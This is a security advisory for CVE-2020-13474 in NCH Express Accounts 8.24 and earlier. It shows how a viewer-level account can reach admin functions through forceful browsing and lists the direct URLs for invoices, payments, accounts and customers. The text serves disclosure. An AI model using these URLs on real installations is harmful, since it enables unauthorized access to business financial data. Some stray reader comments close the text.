Vulnerable Software: NCH Express Accounts
Vulnerability: Privilege Escalation
Affected Version: 8.24 and prior
Vendor Homepage: https://www.nchsoftware.com/
CVE: CVE-2020-13474
CVE Author: Tejas Nitin Pingulkar
Exploit Available: Yes
About Affected Software
Express Accounts is professional business accounting software, perfect for small businesses needing to document and report on incoming and outgoing cash flow, including sales, receipts, payments, and purchases.
Additional Information
NCH Express Accounts software allows you to access it over the web.
A web interface provides three types of user
- Administrator
- User
- Viewer
The administrator user has access to all modules, including Create a new invoice, Create a new quote, Create new sales order, Create new purchase order, Apply customers payment, View Credit notes, Enter new accounts payable, view chart of Accounts, Make a Payment, Receive a payment, Add new item, Add new customer, Suppliers list, Add/Edit users.
User with viewer privileges don’t have access to above-mentioned functionalities by forceful browsing. We will access admin modules using viewer user privileges
Exploit
I have created below users for POC
Admin user: admin@tejas.com
Viewer user: lowuser@tejas.com
As demonstrated in video, “chart of accounts” has only one entry, and lowuser@tejas.com don’t have access to “chart of accounts” functionality (or any other module mentioned above) reference video [2:14 min]
login as low privileged user and enter the below URL
Click add new account
fill in all details click okay
Via forceful browsing, we were able to add an entry as low user
Similarly below via forceful browsing, we can access below mentioned functions
Add New Invoice: http://[website:port]/invoiceprop?onok=invoicelist&oncancel=invoicelist
Add New Quote: http://[website:port]/quoteprop?onok=quotelist&oncancel=quotelist
Add New Sales Order: http://[website:port]/orderprop?onok=orderlist&oncancel=orderlist
Add New Purchase Order: http://[website:port]/porderprop?onok=porderlist&oncancel=porderlist
Payment:http://[website:port]/porderprop?onok=paymentlist&oncancel=paymentlist
Credit Notes:http://[website:port]/creditnotelistperiod
Account Payable: http://[website:port]/accpayable?onok=billlist&oncancel=billlist
Chart of Accounts: http://[website:port]/acclist (video POC)
Payments and Purchases: http://[website:port]/cashtxn?payment=1
Receipts and Deposits: http://[website:port]/cashtxn?payment=0
Add New Item: http://[website:port]/itemprop?onok=itemlist&oncancel=itemlist
Add New Customer: http://[website:port]/customerprop?onok=customerlist&oncancel=customerlist
Suppliers List: http://[website:port]/supplierlist
Proof Of Concept
Thank you!!1
Muchas gracias. ?Como puedo iniciar sesion?